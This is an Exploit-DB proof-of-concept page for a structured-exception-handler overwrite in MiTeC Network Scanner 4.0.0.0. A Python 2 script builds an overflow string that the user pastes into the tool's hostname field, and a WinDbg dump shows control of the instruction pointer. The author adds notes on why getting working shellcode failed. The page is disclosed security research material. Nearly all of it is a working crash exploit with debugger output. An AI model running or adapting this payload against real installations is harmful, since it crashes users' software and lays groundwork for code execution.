Network Scanner 4.0.0.0 – Crash (SEH) (PoC)

  • Author: INSECT.B
    Date: 2016-02-15
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/39447/

    #-*- coding: utf-8 -*-
    #
    # Exploit Title: Network Scanner Version 4.0.0.0 SEH Crash POC
    # POC Dork: N/A
    # Date: 2016-02-15
    # Author: INSECT.B
    # Twitter : @INSECT.B
    # Facebook : https://www.facebook.com/B.INSECT00
    # Blog : http://binsect00.tistory.com
    # Vendor Homepage: http://www.mitec.cz/
    # Software Link: http://www.mitec.cz/Downloads/NetScan.zip
    # Version: 4.0.0.0
    # Tested on: Windows7 Professional SP1 En x86 
    # CVE : N/A
     
    '''
    [+] Type : SEH
    [-] Insert the string produced by this file into the 'Detect IP from Host name...' field on the [TOOLS] tab
    [-] string : AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAÌÌÌÌBBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
    [-] crash info
    (2d0.878): Access violation - code c0000005 (first chance)
    First chance exceptions are reported before any exception handling.
    This exception may be expected and handled.
    eax=00000000 ebx=00000000 ecx=42424242 edx=772571cd esi=00000000 edi=00000000
    eip=42424242 esp=0012edd8 ebp=0012edf8 iopl=0 nv up ei pl zr na pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210246
    42424242 ?????
    
    0:000> !exchain
    0012edec: ntdll!ExecuteHandler2+3a (772571cd)
    0012f534: 42424242
    Invalid exception stack at cccccccc
    
    0:000> d 12f534
    0012f534  cc cc cc cc 42 42 42 42-43 43 43 43 43 43 43 43  ....BBBBCCCCCCCC
    0012f544  43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
    0012f554  43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
    0012f564  43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
    0012f574  43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
    0012f584  43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
    0012f594  43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
    0012f5a4  43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
    0:000> d
    0012f5b4  43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
    0012f5c4  43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
    0012f5d4  43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
    0012f5e4  43 43 43 00 95 b4 31 74-84 f6 12 00 00 00 00 00  CCC...1t........
    0012f5f4  0a 80 00 00 ea 01 24 00-00 00 00 00 00 00 00 00  ......$.........
    0012f604  ab 00 0a e7 34 f6 12 00-e7 c4 06 77 ea 01 24 00  ....4......w..$.
    0012f614  15 02 00 00 00 00 00 00-00 00 00 00 15 02 00 00  ................
    0012f624  cd ab ba dc 00 00 00 00-84 f6 12 00 15 02 00 00  ................
    
    
    '''
    
    import struct

    # Python 2 script (str is a byte string here).
    junk1 = "A" * 76               # 76 bytes of filler reach the SEH record on the stack
    nSEH = "\xcc\xcc\xcc\xcc"      # overwrites the next-record pointer (seen as cccccccc in !exchain)
    SEH = "BBBB"                   # overwrites the handler pointer (eip = 42424242 at the crash)
    shell = "C" * 300              # trailing filler after the SEH record

    payload = junk1 + nSEH + SEH + shell
    with open("netEx.txt","wb") as f :
    	f.write(payload)
    print payload
    
    """
    Exploit problem
    
    1. Input string(value) was replaced '0x3f' in the memory. then shellcode should be encoded to alpha_mixed.
     Buffer size was 171 bytes. but, encoded shellcode size was over 600 bytes.
    
    2. Null byte cannot be inserted into Input field. so we can't use SEH pointer in a range of NetScanner.exe address (0x00400000~0x008c3000)
    
    3. payload was consisted of'junk - shellcode - nSEH ptr - SEH ptr'. but this step was fail. because junk buffer size was 76 bytes.
     Can't insert shellcode
    
    """